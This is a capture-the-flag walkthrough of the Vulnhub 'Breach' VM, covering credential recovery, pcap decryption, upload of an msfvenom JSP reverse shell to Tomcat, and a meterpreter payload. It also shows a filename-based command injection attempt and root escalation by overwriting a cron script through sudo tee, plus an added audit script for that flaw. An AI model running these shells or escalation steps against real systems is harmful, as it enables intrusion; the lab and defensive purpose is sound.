First we start with an nmap scan, but it took far too long to enumerate,
so I tried browsing to the IP and found a website there, so I started nikto and dirb.

Decoding this string in base64 gives us


#TODO Where is the pcap located on the website

From checking the source code of the web application I found a strange string that looked like base64, and it gave me a user/password to log in to the ImpressCMS.

When I found the keystore I downloaded a tool to bruteforce the password, because I needed the private key to be in a different format to be able to export it in Wireshark to decrypt the pcap.

While this worked, I tried to be smart about it and ran strings on the keyfile, which revealed the word “tomcat”, so I tried it as the password and it worked!

After finding the password is tomcat:

keytool -importkeystore -srckeystore <keystore> -srcstoretype JKS -deststoretype PKCS12 -destkeystore keystore.p12
Export the private key from the p12:
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem
This decrypts the pcap.

Authorization Basic

After searching a LONG time on how to connect to the Tomcat service (Firefox doesn't work, netcat neither), I found out you can do that with openssl.

openssl s_client -connect
After debugging the openssl for hours I decided to try with a browser other than Firefox; I was able to reach the Tomcat server with Edge!

We can login with the credentials found in the pcap

Because we are admin of the tomcat we can upload a malicious file

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see name of jsp to call

inflated: zhawsspalj.jsp
nc -lvp 443

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf -o breachmeter.elf

While enumerating the system I found there isn't a root password for MySQL, so I dumped the whole database and found the MD5 hash for the user milton.

Submitting this hash to CrackStation revealed the password is thelaststraw.

Checking the logs on this server revealed:
Jul 5 06:39:01 Breach CRON[2985]: (root) CMD (/usr/share/cleanup/

After trying to inject bash commands into the script (because I control the destination), I found a way to bypass the script so it doesn't delete my file, because it doesn’t handle spaces.
I tried injecting a command with a filename like a&&wget so the command that would be passed to the shell would be
rm -rf swingline/a&&get, which would execute the command.

I banged my head for about two days trying to exploit via this method.
I found something useful on the internet on how to inject arguments without spaces.
Even this didn’t work, so I did what I had learned best while doing my OSCP: Try Harder! (If you are stuck somewhere, restart your enumeration from scratch.)
While restarting my enumeration I came across a comment in one of the images of the website while running exiftool on it.

It had the comment “coffeestains”.
From remembering my enumeration I knew there was another user on the system that didn’t seem to interact with it (no trace of him in the logs and nothing in his home directory); his name is blumbergh. I had already tried some basic passwords on the account, but this time I tried with the new information.

su blumbergh // coffeestains

I was in!

I thought he was the server administrator, because he wouldn't need to write anything in his home directory if we can be root.

sudo -l
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/

Okay, we don't have all the sudo privileges, but we can modify!

cat /tmp/ | sudo tee /usr/share/cleanup/
From now on we just wait for a connection with our Metasploit handler.

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

We then get a shell as root! Finally 🙂
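
The misconfiguration that sudo -l exposed above (a NOPASSWD rule for tee on a file that a root cron job executes) is something a defender can audit for. The script below is an added example, not part of the original write-up or the VM; the users, paths and list of write-capable binaries are constructed assumptions, and it only reads plain sudoers user specs and /etc/crontab-style lines.

```sh
# Added example, not from the write-up: flag sudoers rules that let a user write,
# as root, to a file that a root cron job executes. No alias expansion.
WRITERS='^(tee|cp|mv|dd|install|sed|vi|vim|nano)$'  # can write to a path argument

audit_sudo_cron() {  # usage: audit_sudo_cron SUDOERS_FILE CRONTAB_FILE
  awk -v writers="$WRITERS" '
    FILENAME == ARGV[1] {                  # crontab: five time fields, user, command
      if ($0 !~ /^[ \t]*#/ && $6 == "root") {
        cmd = ""
        for (i = 7; i <= NF; i++) cmd = cmd " " $i
        rootcmd[++n] = cmd
      }
      next
    }
    NF == 0 || /^[ \t]*(#|Defaults|[A-Za-z]+_Alias)/ { next }
    {
      spec = $0
      sub(/^[^=]*=/, "", spec)             # drop "user host="
      gsub(/\([^)]*\)/, "", spec)          # drop the (runas) list
      gsub(/[A-Z_]+:/, "", spec)           # drop tags such as NOPASSWD:
      nc = split(spec, cmds, ",")
      for (c = 1; c <= nc; c++) {
        nw = split(cmds[c], w, " ")
        bin = w[1]; sub(/.*\//, "", bin)
        if (nw < 2 || bin !~ writers) continue
        for (i = 2; i <= nw; i++) {
          if (w[i] !~ /^\//) continue
          for (k = 1; k <= n; k++)
            if (index(rootcmd[k], w[i])) { print $1, bin, w[i]; break }
        }
      }
    }' "$2" "$1"
}

demo() {  # constructed sample data: users and paths are hypothetical
  dir=$(mktemp -d)
  cat >"$dir/sudoers" <<'EOF'
alice ALL=(root) NOPASSWD: /usr/bin/tee /opt/example/nightly.sh
bob   ALL=(root) NOPASSWD: /usr/bin/tee /var/tmp/notes.txt
carol ALL=(root) /usr/bin/systemctl restart example
EOF
  cat >"$dir/crontab" <<'EOF'
*/3 * * * * root /opt/example/nightly.sh
0 4 * * * www-data /var/tmp/notes.txt
EOF
  audit_sudo_cron "$dir/sudoers" "$dir/crontab"
  rm -rf "$dir"
}
demo   # prints: alice tee /opt/example/nightly.sh
```

Each output line is a user, the write-capable binary and the root-executed path; the fix is to remove the rule or make the cron job run a file only root can write by any route.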

root@Breach:/root# cat .flag.txt
cat .flag.txt

______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/’ |______| | | |__ ___| |__ _ __ __| |
| ___ \ ‘__/ _ \/ _` |/ __| ‘_ \ | | | /| |______| | | ‘_ \ / _ \ __| ‘_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|

Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.

